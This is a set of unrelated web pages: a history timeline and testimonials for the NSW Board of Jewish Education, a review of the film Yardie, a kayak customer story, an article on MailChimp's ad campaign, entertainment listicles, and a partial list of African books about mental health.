1868 The Sydney Hebrew School in Pitt Street was certified as a “Denominational School” under the 1866 Act. This was New South Wales’ first successful day school; its initial enrollment was 99 students and its first headmaster was Rev. A. Levi.
1880 State Aid to denominational schools ceased with the introduction of the Public Instruction Act.
1882 The day school closed and the Sydney Jewish Education Board was established to conduct classes under the Right of Entry system. Rev A. B. Davis was President, and the first classes were held at Fort Street, Crown Street and William Street Public Schools.
1884 Louis Pulver, “a heaven-born instructor of youth”, was appointed Headmaster of the Sydney Jewish Education Board and the Sydney Jewish Sabbath School. He instituted weekday afternoon classes to supplement the Right of Entry classes, regularised the curriculum and prepared texts to suit his pupils’ needs. These included “First Bible Stories for Little People”, “A Hebrew and English Vocabulary of 650 Words” and “Elementary Exercises in Hebrew Grammar”.
1897 Death of Louis Pulver and appointment of M. A. Cohen BA as Headmaster.
1905 Rabbi Francis Lyon Cohen appointed Chief Minister of the Great Synagogue and President of the Sydney Jewish Education Board.
1909 On 4 February, 1909 a general meeting of the members and subscribers of the Sydney Jewish Sabbath School resolved, “that as from 1st Adar 5669, the 22nd February, 1909 this Institution, the Sydney Jewish Sabbath School, be amalgamated with the Sydney Jewish Education Board to form a New South Wales Board of Jewish Education”. Its President was Rabbi Francis L. Cohen and Headmaster M. A. Cohen.
1924 Abraham Rothfield, MC and Bar, BA was appointed Headmaster. “He had a way with him of making his pupils love him, winning his way into their hearts by a kind smile, a fund of stories and a gentle manner.”
1927 The Women’s Auxiliary, formed under the chairmanship of Mrs F. L. Cohen, organised fundraising, social activities and adult educational programs. The Auxiliary was re-organised in 1952 with Mrs Bertha Porush as President.
1940 Rabbi Dr Israel Porush appointed Chief Minister of the Great Synagogue and Hon. Director of Education of the Board.
1945 Rev Caesar Stanton (Steinhof) appointed Headmaster, holding office with Abraham Rothfield.
1950 Miss Naomi Goldsmith appointed General Secretary, a position she held until her death in 1980. “She was a woman of quality – a true lady, marked by her sense of dignity, of beauty, of loyalty, of fair-mindedness and of Judaism.”
1950s The rise of the Jewish day school movement in NSW.
1954 Hillel College Kindergarten established with Mrs Ruth Scheinwald (Yorke) as its first Director.
1957 Rabbi T. Rafalowicz, MA, appointed first full-time Director of Education.
1967 The Jewish Communal Appeal established. The Board has benefited greatly from JCA funding.
1970 Lionel Link, MA Dip Ed MACE, appointed Director of Education. His highest priority was the training of teachers.
1976 Rabbi Raymond Apple AM RFD BA LLB MLitt appointed Hon. Director of Education.
1979 Harold Nagley BA (Hons) Dip Ed MA (Syd) MIL MACE, former Principal of Moriah College, was appointed Director of Education. He brought to the Board a lifetime of familiarity with best practice in Jewish education.
1987 Max Wahlhaus, BA Dip Ed, appointed Director of Education. During his term of office and under the presidency of Bernard Levy, the Board introduced Hebrew elective classes into public schools in 1989 with 14 students enrolled.
1997 Lilly Maltz, BA Dip Ed, appointed Principal. Development of BJE as a centre for professional development of educators of Judaism and related subjects.
1998 “Turning of the Soil” for new BJE centre. Rabbi David Rogut presided.
1999 Official opening of the NSW Board of Jewish Education, BJE Jewish Education and Resource Centre at 56 Roscoe Street, Bondi Beach by the Ambassador of Israel, Mr Shmuel Moyal.
1999 First Discover Israel (now known as Emet Israel) Programme for state high school students.
2000 BJE operates JSN program in high schools.
2002 Launch of BJE website, www.bje.org.au.
2004 Implementation of NETA high school Hebrew curriculum.
2005 Living in Harmony grant for interfaith program (Studies of Religion).
2006 Introduction of Children’s Jewish Book Week.
2007 Implementation of the early childhood Hebrew program Chalav uD’vash.
Commencement of the Year 10 Discover Israel (now known as Emet Israel) Programme in conjunction with the Alexander Muss Institute.
2008 Rachele Schonberger B Ed, M Ed, Cert IV appointed Principal and Co/CEO with Robert Greenfield B.Comm. CA. CPA FAICD.
Introduction of the Discover Israel Years K-10 Integrated Curriculum, funded by the L A Pincas Fund.
2009 BJE centenary year.
Launch of revised curricula for SRE (‘Scripture’)(now known as ‘Emet’) and JSN (now known as ‘Emet High School’).
2010 Re-launch of the BJE website, www.bje.org.au. Restructure of JSN (now Emet High School) program and launch of its Facebook page Kangajew.
2011 Completion of the revised Emet (‘Scripture’) curriculum.
2012 Introduction of the high school Ulpan Or curriculum.
Launch of ‘Emet’ programs.
2015 Partnership of BJE and Y2i to enable all year 10 students to access the Emet Israel Program.
2016 Relaunch of the BJE website.
2016 Launch of the Breakout Retreat camp for year 6 students across NSW.
2017 Appointment of a new Board of Management.
2018 Hilit Man appointed as CEO.
Launch of the Parent Engagement Program.
Completion of the Jewish SRE High School Program.
2019 BJE is accredited as a Service NSW Creative Kids provider for Hebrew classes before and after school.
BUILDING ON THE PAST TO SECURE THE FUTURE
From 1909 until 1960 the NSW Board of Jewish Education housed its administrative headquarters in other communal institutions including the Great Synagogue and the Maccabean Hall.
By 1954 the Board had acquired property at 134 Old South Head Road, Bellevue Hill and established there the Hillel College Kindergarten, followed in 1958 by the Hillel Talmud Torah. In 1959 it moved its administration to the same site. The King David School (now part of Moriah College) was also housed for some years in the Hillel Talmud Torah.
In 1970 the Board resolved that the name ‘Rabbi Porush Kindergarten’ be affixed to the front of the kindergarten building in recognition of Rabbi Dr Israel Porush’s many decades of devoted service to Jewish education.
Apart from its activities in the service of school-aged children, youth and adults, the Board also operated the Yolanda Kramer Kindergarten at Strathfield and the Cohn Maroubra Community Kindergarten at Maroubra. In 1984 the Bondi Beach Pre-School was opened at 56 Roscoe Street, Bondi Beach.
In 1997 the Council, under the presidency of Jack Fisher, decided to completely rebuild the premises at Roscoe Street to house the new Academy BJE Jewish Education and Resource Centre. Today the Centre is a dynamic hub of activity which services the administrative, educational and communal needs of BJE.
Payments to BJE
Donations to BJE
As a mother of three young children in the NSW public school education system, I appreciate and value the work that BJE provides to our children in the way of Jewish education and learning. From engaging children as young as 5 years old in the classroom in helping them to learn and understand Jewish traditions and values, to the work that is being done with the older children in the way of Project Heritage where our children can hear first-hand accounts of the experience of Holocaust survivors, our children are the beneficiaries of your dedicated team who put hard work and effort into teaching our children the importance and value of our Jewish history and customs.
Annette O 2 January 2019
Over two years after undertaking the BJE Israel Program, the friendships that I formed on the trip are still very strong, in particular those interstate friends who I never otherwise would have met.
The Israeli food was a huge highlight for me, it doesn’t matter where I went, I managed to get a great shawarma and falafel every time!
The trip itself is excellent and very well organised, with several structured activities happening every day, and on a weekly basis we would stay off-campus at various Israeli locations.
My favourite parts of the trip would have to be floating in the Dead Sea, the Gadna experience, as well as frequently attending the markets.
Adam B, 2016 BJE Israel Program participant 10 January 2019
I came one week late so the depth of the first week can be compared to the kiddies rock pool in Bondi beach. From the moment I arrived everyone welcomed me and I felt at home even though I was in a country that was almost the geographical polar opposite of Australia.
I met so many new people and forged new friendship that I know will last a life time. The endless banter, inside jokes and outright ridiculousness that occurred made the trip that much more amazing.
Oliver Karras 12 November 2015
BJE has enriched the lives that of our children and invigorated their knowledge of, and enthusiasm for, Judaism. It’s a wonderful opportunity for the kids to learn about their Jewish identity and develop a sense of belonging while at a public school. Kudos to BJE for striking a great balance between learning and fun, we are lucky to have you!
Vicki L 2 January 2019
Our son started year 5 at Moriah this year. I was a bit concerned when they decided to only have alef and bet streams for Ivrit this year and no gimmel, as this would be a big challenge for him coming into such an immersive environment.
But I have been pleasantly surprised when helping him with his Hebrew homework at how well beautifully he reads which has been helping him keep up.
Credit goes to all the great work that you do at BJE. What a great contribution make to our children's lives!
Jonathan Benjamin Parent - Clovelly Public School 12 November 2015
We have had 4 children go through BJE for 8 years and our eldest son is more than excited to go to Israel next year. We are pleased that our children can come home and teach us about the traditions and the ins and outs of the festivals.
Monique 2 January 2019
Since being a madrich I have only had the opportunity to take the older years or mainly year 11/12, so this year having the year 7/8 group was very different. Seeing year 7/8 in discussion was something I hadn’t seen before, I couldn’t believe how involved they were, it was truly amazing.
Their overall response to camp was that they found it amazing and wanted to know if we had more camps running throughout the year. Most of them didn’t come from a religious household so seeing a full Shabbat with shule service and dinner was pretty different for them, and I think those were the chanichim that enjoyed it the most.
All of the chanichim loved their madrichim and were sad to leave after having such an amazing time
Simon Spiro 12 November 2015
Happy Shavuot
BJE has been counting the days and we are so excited to launch our blog in time for Shavuot! There have been so many impressive BJE happenings around Sydney, that we wanted to share these incredible things with you on a regular basis. You will see glimpses of your children ‘in action’ through photos and […]
Pesach Rocks at BJE
As well as classroom activities, students at selected schools enjoyed BJE’s Pesach Extravaganza of Pesach-themed activities in the days leading up to Pesach. Here are some happy memories of those experiences …
BJE Hits the Sweet Spot
Recently, the NSW Board of Jewish Education held its first High School social events for the year at Max Brenner outlets in the East and in the northern suburbs. Formerly known as Coffee Hour, Chocolate Fusion is a termly yearly meet-up which provides an opportunity for students from BJE-affiliated public schools in the East and northern suburbs […]
BJE inspires the Jewish Identity of our Community’s youth by providing a comprehensive Jewish education in NSW State Schools. All programs embody the BJE philosophy of providing intelligent and engaging classes and activities which bring Judaism to life.
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Film Review: Yardie
“I Sent You To London So You Wouldn’t Start A War In Kingston…”
With hot rumours surfacing of him taking the role of the next James Bond and the return of BBC’s hit crime drama, Luther, in the near future, it’s fair to say that Idris Elba is indeed a busy, busy man, and with a fundamental warmth and undeniable likeability, Elba’s career seems to be going from strength to strength even when the steely-eyed few still remember Elba’s superb performance as Stringer Bell in the greatest television programme of all time, The Wire. It comes with a particularly heavy heart therefore that Elba’s directorial debut, a hazy adaptation of Victor Headley’s 1992 cult novel, Yardie, is unfortunately a plodding, strangely dull and overly cliched crime drama which fails to ignite the touchpaper of Elba’s switch from in front of the camera to behind it. With dedicated performances from many newcomers within the cast, an eclectic mix of groovy musical accompaniments and an obvious love for the source material from Elba, Yardie isn’t exactly terrible, but its’ major flaws are so crushingly obvious that it’s hard to paint over the cracks in order to make the film better than it really is.
Focusing on Aml Ameen’s (Kidulthood) Dennis “D” Campbell and his rise within the criminal underworld of a poverty stricken Kingston, Jamaica, the early exposition of the movie is recalled through the age-old use of voice-over, and whilst my own personal preference for storytelling undoubtedly favours a “show me, not tell me” format, Elba’s particular narrative technique does quickly become overly cheap and relatively boring as every single movement is described when the audience is already ten steps ahead. With the movie primarily suffering from an utter lack of effective characterisation which results in the film simply being observed than truly being sucked into the drama, the overly familiar gangster set-up fails to carry any fresh ideas, even when its’ key characters on the surface are interesting but are unfortunately let down by poor writing and dialogue which is as hokey as it is sometimes undecipherable. With a groovy soundtrack and some smokey, 70’s era London cinematography, Elba’s vision for the movie is admirable but with the whole much weaker than the sum of its’ parts, Yardie is a yawn-inducing disappointment.
Tags: Akin Gazi, Aml Ameen, British, Brock Norman Brock, crime, drama, Everaldo Creary, Film 2018, Film Review, Fraser James, Idris Elba, Independent, Shantol Jackson, Stephen Graham, Victor Headley, Yardie
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FOR J.P. GARZA, SEA EAGLE’S RAZORLITE® 473rl LEADS TO ADVENTURE
J.P. shared an expedition with friends on the Papaloapan River in Veracruz, Mexico.
“I’m all about adventure,” says J. P. Garza, 51, of Villahermosa, Tabasco, Mexico. “I love to explore and discover natural new places, especially by water in the southeast of my country and in Central America.”
Garza has traveled most of these regions by roads, terraces and trails, not only by car but by mountain bike as well. In fact, until recently, he considered himself a serious cyclotourist. These days, however, he prefers touring with his Sea Eagle RazorLite® 473rl inflatable kayak (IK). He has paddled over 3,000 kms (1,900 miles,) he says, never repeating the same river, lagoon or sea shore.
“Water is a resource that abounds in this area,” explains Garza, “and it offers a different perspective when exploring and enjoying the natural world. Rivers are the oldest paths of my country and while many have forgotten their importance these days, they have served as the main means of communication in the jungle since the pre-Columbian era. That’s why their shores host old churches and abandoned ancient cities – and it’s why I think waterways are the best and most interesting means to discover and learn about the natural beauties and historical places that we have.”
Garza stresses such adventure and contact with nature must be accomplished with respect for the environment and an ecologically healthy approach. If it can also be inexpensive, so much the better. Inflatable kayaks, he says, are the perfect fit as they allow him to achieve all of the above. Being able to maintain a decent speed without the noise of an added motor lets him quietly cover plenty of water and leads to more wildlife encounters.
The Champoton River in Campeche, Mexico, says Garza, is a beautiful stretch you can really only see and enjoy fully by way of an inflatable kayak.
“Using my IK, I come across a lot of wild animals on these trips,” reveals Garza. “Some, like a jaguar I spotted in the Belize River, few people ever get to see in a natural setting.”
Another important reason for kayaking on these expeditions, states Garza, is that it allows access to places larger vessels can’t navigate due to rapids, shallow waters or other obstacles. What you can’t push through on the water, you can sometimes bypass by carrying your IK, he explains.
In his expedition search for the beginning of the Champoton River in Campeche, Mexico, Garza had to back-pack in his Sea Eagle RazorLite® 473rl inflatable kayak.
“Many of the places I explore have never been navigated,” continues Garza. “I do serious expedition tours, so I need a kayak that’s inflatable to have the freedom to transport it in any way: taxi, bus, Uber, car or even carrying it on my shoulder. Using my Sea Eagle RazorLite® I have navigated rapids, flat waters and the open sea. It’s extremely versatile, easily portable and – inflated at 10 psi -incredibly hard. Its overall performance is as good as a hard shell kayak yet it remains as portable as a regular IK. Sleek and narrow, it goes real fast but remains tough enough to take far from the nearest road with no concerns about getting back. Stability is another issue that kayakers are always worried about, but not me. My RazorLite® handles anything Mother Nature dishes out.”
Given his need to travel long distances – not always an easy task in the areas he explores -Garza especially appreciates that he can simply pack up his RazorLite® and bring it anywhere. He also loves that it folds into a small square that can be easily stored. Storage room is at a premium in many Mexican homes, he notes, so being able to put it away neatly is a real plus.
“My Sea Eagle RazorLite® weighs only 35 pounds,” says Garza, “and it packs-up nice and tight. It can also take a beating and keep on going. My girlfriend Xiomi and I took it close to the Guatemalan border recently and paddled over 400 kms (250 miles) down the Usumacinta River to the Gulf of Mexico. We needed the fastest two-person inflatable kayak in the world to travel such a distance in only five days and the RazorLite® was it. On the last day of the expedition, Xiomi and I had to paddle over 100 kms (70 miles) from Jonuta to Frontera City as there were no places to stay the night. I’m convinced the Sea Eagle 473rl is the only two-person IK in the world that can cover so long a distance in a single day.”
The Usumacinta River, which flows though southeastern Mexico and northwestern Guatemala, provided Garza and Xiomi with a more than 400 kms (250-mile) IK adventure.
It would be almost impossible to do the expeditions he and his girlfriend undertake twice a month using a hard shell kayak, believes Garza. “The logistics would be too complicated, especially when you have to cross international borders. For us, it doesn’t make sense to waste the extra time, money and effort to travel with a hard shell. Many traditional kayakers don’t know about the latest IK technology. They don’t know how fast and how tough these kayaks can be, especially with drop-stitch design like Sea Eagle uses in its RazorLite®. Hopefully, my fellow kayakers are starting to see this when they view my adventures on social media or read the articles I write in magazines and Mexican newspapers.”
As for the RazorLite’s speed, Garza finds it exceptionally fast. “My girlfriend and I entered a 37 kms (23-mile) hard shell kayak race with it and finished third overall. We were the only IK in the race. The RazorLite’s sleekness is one reason for its great speed; another is that it is so steady and solid it feels like a hard-shell kayak. It’s as tough as they come, and very responsive. It lets you get in a lot of exercise without feeling like you are doing that much work.”
J.P. and his girlfriend, Xiomi, recently took third place in a 37 kms (23-mile) kayak race. Their Razorlite was the only inflatable in the field.
Garza says there are places in Mexico and Central America that can be reached only by kayak such as the lost archeological site Arrecife, which is hidden in a small islet in the north of Cozumel. The entire Champoton River, from its remote beginning to its terminus at the Gulf of Mexico, is another example. Here Garza had to backpack in to find the narrow creek which served as the river’s origin. (You can see a clip of this trip on JP’s Facebook page, here.)
“I push into places other people rarely see and I find that tremendously rewarding,” surmises Garza. “When you get into these places, you never know what you might see. Last winter Xiomi and I navigated in Expedition Gran Arrecife Maya, paddling more than 500 kms (310 miles) from Majahual, Mexico to Rio Dulce, Guatemala. Over 17 days we used our inflatable kayak to explore the second largest coral reef in the world. We saw amazing islets and breath-taking scenery. There were many kinds of wild animals here including sea turtles, dolphins, alligators, monkeys and a great diversity of fish.
“I think if more people kayaked, they might have a better appreciation for the environment and all things beautiful, peaceful and wild. That might help them to be more conservation-minded – and that’s something we really need in today’s world.”
At Sea Eagle, we couldn’t agree more.
September 4, 2018 SeaEagleBoats
Previous Previous post: Ingenuity Opens New Doors for Disabled Paddlers
Next Next post: EARTH, WIND AND FIRE – the week it only got worse, but all was good in the end
What to Do With Your Sea Eagle in the Winter
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How MailChimp And Droga5 Created The Year’s Weirdest Ad Campaign
Written by Kristine Colosimo
In the past 8 years, MailChimp, an email automation platform, has gone from SMB darling to mainstream royalty. How? By creating the year’s weirdest campaign: “Did You Mean MailChimp?” MailChimp’s first major marketing campaign blended the brand’s quirky identity with a series of cultural activations spanning film, music, and fashion. At Northside Festival 2017, Mark DiCristina (MailChimp‘s Senior Brand Marketing Director) and Julian Cheever, (Droga5’s Executive Group Director) discuss the conceptualization and execution of this unconventional campaign and how they allow entrepreneurs to “grow without compromise.”
Breaking the rules of storytelling
To get noticed, sometimes you have to break some rules; MailChimp did just that with their campaign narrative. But before they could break rules, the company had to understand its brand identity and the channels that best capture its vision. Eight years of rapid growth (and sponsorship of popular podcasts like NPR’s Serial) had already resulted in a cult following, so MailChimp understood its existing customer base, but they wanted to push further, reaching a wider audience. “We wanted to make it feel like MailChimp, but also go into uncharted territory,” says DiCristina.
The result ended up being very unique and very MailChimp. MailChimp launched a series of new “products:” FailChips, a line of potato chips made of chip crumbs; MaleCrimp, an outrageous fashion trend which made its way to New York Fashion Week; VeilHymn, a musical collaboration between Dev Hynes and Bryndon Cook; three artistic short films (JailBlimp, KaleLimp, and MailShrimp); and a few web experiences like NailChamp and WhaleSynth. Straddling a fine line between artsy and downright absurd, these ads served as tools to articulate definitive qualities of the MailChimp brand and voice. Despite spanning a wide range of visuals, the “products” all bore one thing in common: their names all sounded like “MailChimp.” Keener observers might even spot Freddie, MailChimp’s logo and mascot, lurking in an inconspicuous corner.
Recounting the projects, DiCristina explains that the campaign was innovative from an internal perspective, as well. “[With FailChips], I never expected to work at a software company that made a tangible product.” The campaign made clear that MailChimp thrives on experimentation and doesn’t take itself too seriously. “[With MaleCrimp], we wanted to see what would happen if we not only started a product, but a trend, and see how people would react,” DiCristina says. “There was a nice serendipity when we spotted French Vogue models crimping their hair during men’s fashion week.” By targeting specific subcultures, MailChimp encouraged its audience to connect the dots and have fun—even if that meant overlooking their brand presence at first glance. “Being okay with who you won’t connect with is a real catalyst to great work,” says DiCristina.
From Brand Awareness to Product Features
Following its brand awareness campaign, MailChimp reached out to SMB owners with ads featuring a black hole. “It was inspired by the anxiety small business owners have about how to spend a small budget. MailChimp is the anti-hero who saves the day,” says DiCristina. These ad spots followed a more traditional online ad campaign strategy. Though their purpose is to cater to a smaller audience and show specific capabilities of MailChimp’s platform, the whimsy remains intact.
Earning One Billion Impressions
To quantify their success, MailChimp measured the number of people talking about their campaign. The results were astounding: they had paid for 500 million impressions. They earned one billion—twice what they’d paid for. The VeilHymn single alone was streamed 1.5 million times, while the three short films played before features in almost 300 theaters across the country.
The secret to MailChimp’s success lies in its sensitivity to the needs of its customers. The brand understood that SMBs, for example, are more often strapped for time and resources, and they’re generally not marketing experts. “We knew we were starting with this big message,” says DiCristina, “but we knew we were going to follow it with how the product can actually help you grow your business.” To further add value to their campaign message, MailChimp wanted to lay out how its powerful set of tools can break down complexities to make marketing feel simple and accessible. “We want to lead by example and show them that it can be done.”
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January 25, 2017 4 Ways You Can Increase Your Email Marketing Impact Today Email Marketing is one of most low-cost, high-yield forms of marketing there is, so it's no surprise that people are constantly trying to improve their numbers. Email marketing apps are a […] Posted in Thought Leadership, Marketo, Marketing, Start Ups, eCommerce, SMB
June 16, 2017 The Top 10 No-Code Apps for Your Workflow According to John Rymer, VP and Principal Analyst at Forrester Research, a heavy reliance on code is insufficient for meeting the changing demands of modern businesses. “If we rely solely […] Posted in Productivity, Salesforce, Intacct, ServiceNow, Marketo, MailChimp, Box, Slack, Marketing, Human Resources, Accounting, Sales, Customer Service, Jira
March 2, 2017 Marketing Automation: Real Time Email Marketing This is part of our series Inside Workato’s Kitchen where we show you how we use our own product to automate each section of the business. Real Time Email Marketing Lists Keeping […] Posted in Productivity, Marketing, Inside Workato's Kitchen
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Gadgets and Science
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BrainBerries / Jim Morrison
13 Facts So Weird, They Seem Totally Fake
If you still don’t know what a phantom vibration syndrome is and just how powerful the iPhone can be – this is your chance to find out the truth! These are not just some random facts you haven’t heard of before, but 13 of the most impossible (and sometimes silly) facts that will definitely broaden your mind. And you’ll also get a chance to show off your new-found knowledge to your friends and co-workers!
11 Gender-Swapped Disney Characters (by Sakimi Chan)
Have you ever though why are there so many Disney princesses yet so few princes? What if Ariel from “The Little Mermaid” was a guy? What if Hades from “Hercules” was a woman? Elsa and Ann from the “Frozen”? More like Els and Frank! Here are some of the most amazing pieces of gender-swapped Disney fan art by a remarkable artist Sakimi Chan from Deviant Art.
These Inventors Regret Their Invention, But At Least They Did Something With Their Life
At some point in life, most people encounter a huge amount of regret of things they did (or didn’t do). And at some point in life, most of those people realize that they’ve done nothing significant with their lives. Very occasionally, even people that actually did something useful in their life later end up regretting that decision. Let’s take a look at some of them.
7 Nigh Legendary Child Actors of 2017
It’s not every year we get to see so many astonishing performances from kids, as we did in 2017. Dafne Keen’s Laura in “Logan”, Anthony Gonzalez’s Miguel in “Coco”… You should have heard and seen these and other names from this list everywhere!
Virtual Avatars Taking Over Instagram!
Meet Miquela Sousa, a 19 years old girl from LA. Nothing too crazy so far, right?
5 Amazing And 5 Bizarre Things You Didn’t Know About Ancient Women
Many people believe that without technologies and modern day amenities ancient people led pretty boring lives. But despite what you may think, some ancient civilizations were quite advanced, even more than modern countries! Women, for instance, used to have much more freedom and power than they’ve had during the past few centuries. Did you know they even invented a type of bikini in Rome? There’s just so much we don’t know about them! Here are 5 amazing and 5 bizarre facts you didn’t know about ancient women.
10 Most Badass Fight Scenes in the MCU (pre-Infinity-War)
Comic book movies are the best, but only if you don’t try to apply too much real-world logic to the plot, and especially you should not question the physics. Let’s just say, as long as your disbelief is dangling nicely in the air, you’ll love Marvel movies.
This Cosplayer Transforms Himself Into World Known Characters, And The Result Is Beyond Amazing
Jonathan Stryker has been on our radar for quite some time now, especially after his debut as a cosplayer of Disney characters. His transformations are so close to the original, it is hard to tell how exactly he creates all those looks. They are stunning and filled with such care and attention to detail that it’s impossible not to fall in love with his work.
10 Instagram Accounts About Art You Need To Follow Right Now
It’s safe to say Instagram is rapidly taking over as the main social media network of choice. Especially when it comes to determining what is cool and what isn’t. And because we’re all cool people, it seems only fair that we inform you about some cool Instagram accounts you should follow right now if you’re into art.
10 Shades of Colors That You Didn’t Know Had Actual Names
What’s your favorite color? If you said purple, you’re super boring, so try again. Malachite? Well la-dee-da! Aren’t you a pretentious fellow! You can’t win is what we’re saying. Anyway, in a world full of colors, some of the shades sort of get lost in the shuffle. But obscure colors deserve some love, right? Here is a list of 10 colors that you may not know, but have definitely seen.
7 Horribly Recast Actors Who Ruined the Movie
Recasting an iconic character can be a near impossible task. But there are certain roles that should have never been recast, as they’ve ruined the entire movie.
7 Best Game Of Thrones Season 8 Rumors And Theories
As you all probably know by now, Game of Thrones will start its last six-episode season in April 2019. After all that’s happened in Westeros for the last seven years, it’s anyone’s guess how the endgame will play out eventually. Let’s take a look at some popular theories and rumors of what could happen in the final season.
Do You Care: 20 Facts About Rihanna
In spite of Riri’s fame, there is plenty about Robyn Rihanna Fenty that you might not know about. With that in mind, here are 20 facts about your favorite singer that will make you slightly more knowledgeable.
Talk About Method Acting: Actors Who Got Tattoos To Commemorate The Movie They Were In
Nowadays tattoos are a dime a dozen, everyone has at least a few. Some people like geeky tattoos of their favorite cartoon characters, others prefer inks with a more sophisticated meaning. For example some actors got matching tattoos to commemorate the movies they starred in!
9 Things You Didn’t Know About Elon Musk
Elon Musk is like a real-life Tony Stark from Marvel: a brilliant engineer, renowned inventor, and billionaire-philanthropist! Everyone knows who he is, but what do we really know about him? Is he an alien or an Illuminati? Probably not, but there are quite a few quirky lesser-known facts about his youth and some of his projects that you may find interesting, so let’s roll.
Brain Berries
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Baboy Is The Goodest Boi Of Them All
This Ocean Wave Resin Table Is The Thing You Need In Your Life
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Features, For Readers Seeking Inspiration, For The Emotionally Evolved Reader, For the Poetry Enthusiast, Lit Scene September 27, 2019
Mental Health: 8 Books by African Authors You Should Read
The subject of mental health is often synonymous with shame, silence, and the need to hide away from the world. The age-long stigma attached to it has made the conversation a difficult one to have. According to MentalHealth.gov, mental health problems are actually far more common than people think. Early warning signs range from eating or sleeping too much or too little, distancing oneself suddenly from people and usual activities, having low or no energy, to yelling and fighting with family and friends and feeling unusually confused, forgetful, on edge, angry, upset, worried, or scared. People with mental health problems are often depressed, enabling such thoughts as harming themselves or the people around them.
In African literature, the subject of mental health is increasingly being engaged by a new generation of self-aware artists who approach the subject with empathy. Some of them, most importantly, wrote from experience. BookShyBooks published a list last year that you should definitely check out. Here are our recommendations.
SKY RAINING FISTS, poetry chapbook by J.K. ANOWE
Winner of the 2017 Brittle Paper Award for Poetry, the gifted J.K. Anowe takes subjects usually overlooked and turns them into statements on the fragility of humanity. His work is an entry point to, and a major influence in, an emerging sub-tradition in the poetry of Nigeria’s new generation. Before him, it was unusual to dramatize mental illness in Nigerian poetry in ways that resonate without ceding artistic merit. Sky Raining Fists is the Praxis Magazine Chapbook Series Editor’s second chapbook, following 2016’s the ikemefuna tributaries. It is now available from the American poetry press Madhouse Press.
Image from Picdeer.
I’M TELLING THE TRUTH BUT I’M LYING, memoir by BASSEY IKPI
Description by its publisher HarperCollins:
In I’m Telling the Truth, but I’m Lying Bassey Bassey Ikpi explores her life—as a Nigerian-American immigrant, a black woman, a slam poet, a mother, a daughter, an artist—through the lens of her mental health and diagnosis of bipolar II and anxiety. Her remarkable memoir in essays implodes our preconceptions of the mind and normalcy as Bassey bares her own truths and lies for us all to behold with radical honesty and brutal intimacy.
From her early childhood in Nigeria through her adolescence in Oklahoma, Bassey Ikpi lived with a tumult of emotions, cycling between extreme euphoria and deep depression—sometimes within the course of a single day. By the time she was in her early twenties, Bassey was a spoken word artist and traveling with HBO’s Def Poetry Jam, channeling her life into art. But beneath the façade of the confident performer, Bassey’s mental health was in a precipitous decline, culminating in a breakdown that resulted in hospitalization and a diagnosis of Bipolar II.
In I’m Telling the Truth, But I’m Lying, Bassey Ikpi breaks open our understanding of mental health by giving us intimate access to her own. Exploring shame, confusion, medication, and family in the process, Bassey looks at how mental health impacts every aspect of our lives—how we appear to others, and more importantly to ourselves—and challenges our preconception about what it means to be “normal.” Viscerally raw and honest, the result is an exploration of the stories we tell ourselves to make sense of who we are—and the ways, as honest as we try to be, each of these stories can also be a lie.
Image from Twitter.
A SMALL SILENCE, novel by JUMOKE VERISSIMO
From its publisher Cassava Republic:
Imprisoned for ten years for his rage against society, activist and retired academic Prof resolves to live a life of darkness after his release from prison. He holes up in his apartment, pushing away friends and family, and embraces his status as an urban legend in the neighbourhood until a knock at the door shakes his new existence.
His new visitor is Desire, an orphan and final year student, who has grown up idolising Prof, following a fateful encounter in her hometown of Maroko as a child. Tentatively, the two begin to form a bond, as she returns every night at 9 pm to see him. However, the darkness of the room becomes a steady torment, that threatens to drive Desire away for good.
A Small Silence is an intimate and evocative debut charges us to look again at the alienating effects of trauma and the power of solitude and darkness to ignite the imagination.
Read our review HERE and an exclusive excerpt HERE.
Image by Lesego N. on Twipu.
THE QUIET VIOLENCE OF DREAMS, novel by K. SELLO DUIKER
Published by Kwela Books. Description from Amazon:
The Quiet Violence of Dreams is set in Cape Town’s cosmopolitan neighborhoods – Observatory, Mowbray and Sea Point – where subcultures thrive and alternative lifestyles are tolerated. The plot revolves around Tshepo, a student at Rhodes, who gets confined to a Cape Town mental institution after an episode of ‘cannabis-induced psychosis’. He escapes but is returned to the hospital and completes his rehabilitation, earns his release – and promptly terminates his studies. He now works as a waiter and shares an apartment with a newly released prisoner. The relationship with his flatmate deteriorates and Tshepo loses his job at the Waterfront. Desperate for an income, he finds work at a male massage parlour, using the pseudonym Angelo. The novel explores Tshepo-Angelo’s coming to consciousness of his sexuality, sexual orientation, and place in the world.
Image from Tope Folarin’s Twitter.
A PARTICULAR KIND OF BLACK MAN, novel by TOPE FOLARIN
From its publisher, Simon & Schuster:
Living in small-town Utah has always been an uneasy fit for Tunde Akinola’s family, especially for his Nigeria-born parents. Though Tunde speaks English with a Midwestern accent, he can’t escape the children who rub his skin and ask why the black won’t come off. As he struggles to fit in and find his place in the world, he finds little solace from his parents who are grappling with their own issues.
Tunde’s father, ever the optimist, works tirelessly chasing his American dream while his wife, lonely in Utah without family and friends, sinks deeper into schizophrenia. Then one otherwise-ordinary morning, Tunde’s mother wakes him with a hug, bundles him and his baby brother into the car, and takes them away from the only home they’ve ever known.
But running away doesn’t bring her, or her children, any relief from the demons that plague her; once Tunde’s father tracks them down, she flees to Nigeria, and Tunde never feels at home again. He spends the rest of his childhood and young adulthood searching for connection—to the wary stepmother and stepbrothers he gains when his father remarries; to the Utah residents who mock his father’s accent; to evangelical religion; to his Texas middle school’s crowd of African-Americans; to the fraternity brothers of his historically black college. In so doing, he discovers something that sends him on a journey away from everything he has known.
Sweeping, stirring, and perspective-shifting, A Particular Kind of Black Man is a beautiful and poignant exploration of the meaning of memory, manhood, home, and identity as seen through the eyes of a first-generation Nigerian-American.
Image from Readbooksonly.
PENUMBRA, novel by SONGEZIWE MAHLANGU
Songeziwe Mahlangu, in an interview, revealed that Penumbra was written partly as an attempt to document his own temporary mental breakdown. From its publisher Kwela Books:
Mangaliso Zolo is a hapless recent graduate, still living in the southern suburbs of Cape Town near the university. Manga has an office job at a large insurance company, but he is anonymous and overlooked in this vast bureaucracy.
Penumbra charts Manga’s daily struggles with mental illness and the twin pull, from his many friends and acquaintances, between a reckless drug-fuelled lifestyle and charismatic Christianity. The novel brings an alternative experience of Cape Town to life, one far removed from both the gloss of tourism brochures and the familiar poverty of the Cape Flats. Mahlangu’s voice is unlike anything South African literature has yet seen and this debut novel dissects young, urban slackers in South Africa with startling precision.
Image from Shereadswithcats.com
FRESHWATER, novel by AKWAEKE EMEZI
Description from Amazon:
